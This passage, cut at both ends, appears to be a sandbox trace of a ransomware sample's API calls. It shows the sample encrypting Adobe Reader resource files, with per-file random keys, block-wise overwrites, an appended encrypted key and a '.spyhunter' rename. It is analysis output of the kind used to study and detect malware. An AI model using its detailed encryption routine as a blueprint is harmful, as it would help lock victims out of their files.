(x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.EUQ" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.990] GetProcessHeap () returned 0x2c0000 [0179.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.990] GetProcessHeap () returned 0x2c0000 [0179.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64040 | out: hHeap=0x2c0000) returned 1 [0179.990] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e300 | out: pbBuffer=0x248e300) returned 1 [0179.990] GetProcessHeap () returned 0x2c0000 [0179.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.990] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2f8*=0x30) returned 1 [0179.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.991] GetProcessHeap () returned 0x2c0000 [0179.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.991] GetProcessHeap () returned 0x2c0000 [0179.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e636a0 | out: hHeap=0x2c0000) returned 1 [0179.991] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e300 | out: pbBuffer=0x248e300) returned 1 [0179.991] GetProcessHeap () returned 0x2c0000 [0179.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.991] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2f8*=0x30) returned 1 [0179.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.072] GetProcessHeap () returned 0x2c0000 [0180.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0180.073] GetProcessHeap () returned 0x2c0000 [0180.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63cc0 | out: hHeap=0x2c0000) returned 1 [0180.073] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e2f8 | out: pbBuffer=0x248e2f8) returned 1 [0180.073] GetProcessHeap () returned 0x2c0000 [0180.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0180.073] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2f0*=0x30) returned 1 [0180.073] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.075] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT") returned 97 [0180.075] StrStrW (lpFirst="CP1252.TXT", lpSrch=".txt") returned 0x0 [0180.075] GetProcessHeap () returned 0x2c0000 [0180.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.075] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e2b4*=0x25b5, lpOverlapped=0x0) returned 1 [0180.175] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffda4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.175] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x25b5, lpNumberOfBytesWritten=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e2b4*=0x25b5, lpOverlapped=0x0) returned 1 [0180.176] GetProcessHeap () returned 0x2c0000 [0180.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.176] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.176] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x248e2f4*, lpNumberOfBytesWritten=0x248e2b4*=0x4, lpOverlapped=0x0) returned 1 [0180.176] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e2b4*=0x30, lpOverlapped=0x0) returned 1 [0180.176] CloseHandle (hObject=0xa0) returned 1 [0180.176] GetProcessHeap () returned 0x2c0000 [0180.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.176] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT.spyhunter") returned 107 [0180.176] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt.spyhunter")) returned 1 [0180.177] GetProcessHeap () returned 0x2c0000 [0180.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.177] GetProcessHeap () returned 0x2c0000 [0180.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0180.177] GetProcessHeap () returned 0x2c0000 [0180.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3040 | out: hHeap=0x2c0000) returned 1 [0180.177] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e2f8 | out: pbBuffer=0x248e2f8) returned 1 [0180.177] GetProcessHeap () returned 0x2c0000 [0180.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0180.177] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2f0*=0x30) returned 1 [0180.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.178] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT") returned 99 [0180.178] StrStrW (lpFirst="JAPANESE.TXT", lpSrch=".txt") returned 0x0 [0180.178] GetProcessHeap () returned 0x2c0000 [0180.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.178] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e2b4*=0x2800, lpOverlapped=0x0) returned 1 [0180.297] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.297] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e2b4*=0x2800, lpOverlapped=0x0) returned 1 [0180.298] GetProcessHeap () returned 0x2c0000 [0180.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.298] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.298] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x248e2f4*, lpNumberOfBytesWritten=0x248e2b4*=0x4, lpOverlapped=0x0) returned 1 [0180.344] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e2b4*=0x30, lpOverlapped=0x0) returned 1 [0180.344] CloseHandle (hObject=0xa0) returned 1 [0180.345] GetProcessHeap () returned 0x2c0000 [0180.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.345] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT.spyhunter") returned 109 [0180.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt.spyhunter")) returned 1 [0180.346] GetProcessHeap () returned 0x2c0000 [0180.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.346] GetProcessHeap () returned 0x2c0000 [0180.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0180.346] GetProcessHeap () returned 0x2c0000 [0180.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2780 | out: hHeap=0x2c0000) returned 1 [0180.346] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e2f0 | out: pbBuffer=0x248e2f0) returned 1 [0180.346] GetProcessHeap () returned 0x2c0000 [0180.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0180.346] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2e8*=0x30) returned 1 [0180.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.347] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt") returned 101 [0180.347] StrStrW (lpFirst="JISX0208.txt", lpSrch=".txt") returned=".txt" [0180.347] lstrlenW (lpString=".txt") returned 4 [0180.347] lstrlenW (lpString=".txt") returned 4 [0180.347] GetProcessHeap () returned 0x2c0000 [0180.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0180.347] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.350] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.350] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.350] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.351] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.351] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.351] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.351] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.351] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.352] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.352] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.352] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.352] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.353] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.353] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.353] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.354] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.354] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.354] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.354] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.354] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.354] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.355] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.355] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.355] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.356] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.356] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.356] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.357] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.357] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.357] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0xea7, lpOverlapped=0x0) returned 1 [0180.357] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff159, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.357] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xea7, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0xea7, lpOverlapped=0x0) returned 1 [0180.357] GetProcessHeap () returned 0x2c0000 [0180.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0180.358] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.358] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x248e2ec*, lpNumberOfBytesWritten=0x248e2ac*=0x4, lpOverlapped=0x0) returned 1 [0180.358] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e2ac*=0x30, lpOverlapped=0x0) returned 1 [0180.358] CloseHandle (hObject=0xa0) returned 1 [0180.358] GetProcessHeap () returned 0x2c0000 [0180.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.358] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt.spyhunter") returned 111 [0180.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt.spyhunter")) returned 1 [0180.359] GetProcessHeap () returned 0x2c0000 [0180.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.359] GetProcessHeap () returned 0x2c0000 [0180.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0180.359] GetProcessHeap () returned 0x2c0000 [0180.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee16d0 | out: hHeap=0x2c0000) returned 1 [0180.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e2f0 | out: pbBuffer=0x248e2f0) returned 1 [0180.359] GetProcessHeap () returned 0x2c0000 [0180.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0180.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2e8*=0x30) returned 1 [0180.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.360] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt") returned 105 [0180.360] StrStrW (lpFirst="Japanese83pv.txt", lpSrch=".txt") returned=".txt" [0180.360] lstrlenW (lpString=".txt") returned 4 [0180.360] lstrlenW (lpString=".txt") returned 4 [0180.360] GetProcessHeap () returned 0x2c0000 [0180.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0180.361] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.444] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.444] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.444] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.445] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.445] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: 